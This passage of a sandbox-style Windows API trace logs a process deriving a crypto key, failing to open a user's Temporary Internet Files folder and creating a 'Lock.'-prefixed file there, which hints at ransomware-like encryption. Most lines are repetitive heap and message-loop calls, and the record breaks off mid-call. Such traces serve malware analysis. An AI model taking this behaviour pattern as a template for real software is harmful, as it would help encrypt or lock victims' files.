[0202.835] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.835] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.835] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.835] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0202.835] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0202.835] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0202.835] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0202.836] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0202.836] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0202.836] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0202.836] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0202.836] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0202.836] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0202.836] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0202.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0202.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaac18, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0202.836] CryptDeriveKey (in: hProv=0xa7c5d8, Algid=0x6601, hBaseData=0x9e1eb8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1bf8) returned 1 [0202.836] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.836] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.836] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.836] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.836] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.836] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.836] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0202.836] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0202.836] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0202.836] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0202.836] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0202.836] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0202.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0202.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7080, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0202.837] CryptDestroyHash (hHash=0x9e1eb8) returned 1 [0202.837] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.837] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.837] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.837] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.837] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.838] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Temporary Internet Files" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temporary internet files"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0202.838] GetLastError () returned 0x5 [0202.839] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0202.839] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.839] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0202.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0202.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0202.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0202.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0202.839] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0202.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0202.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0202.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0202.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0202.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0202.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0202.840] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Lock.Temporary Internet Files" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\lock.temporary internet files"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0202.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70c0 [0202.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0202.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0202.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0202.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0202.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0202.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0202.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0202.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0202.842] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0202.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0202.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0202.842] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0202.842] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0202.842] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0202.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0202.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0202.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0202.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0202.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0202.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0202.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0202.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0202.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0202.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0202.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0202.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0202.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0202.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0202.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0202.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0202.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0202.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0202.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0202.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0202.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0202.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0202.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0202.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0202.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0202.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0202.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0202.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0202.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0202.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0202.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0202.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0202.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0202.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0202.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0202.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0202.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0202.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0202.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0202.844] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0202.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0202.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0202.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0202.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0202.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0202.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72288 [0202.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0202.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0202.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0202.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0202.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0202.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0202.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0202.844] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0202.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0202.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0202.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0202.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0202.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0202.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0202.845] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0202.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0202.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0202.845] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0202.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0202.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0202.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0202.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72298 [0202.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0202.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0202.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0202.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0202.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0202.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72338 [0202.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0202.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0202.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0202.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72238 [0202.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0202.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0202.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0202.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72228 [0202.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0202.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0202.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0202.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa990 [0202.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0202.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0202.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0202.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0202.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0202.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0202.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0202.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0202.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0202.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0202.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0202.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0202.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0202.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0202.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0202.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0202.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0202.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0202.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0202.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0202.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0202.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0202.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0202.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0202.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0202.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0202.847] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0202.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0202.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0202.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0202.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0202.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0202.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0202.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0202.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0202.847] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0202.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0202.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0202.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0202.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0202.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0202.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0202.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0202.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0202.847] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 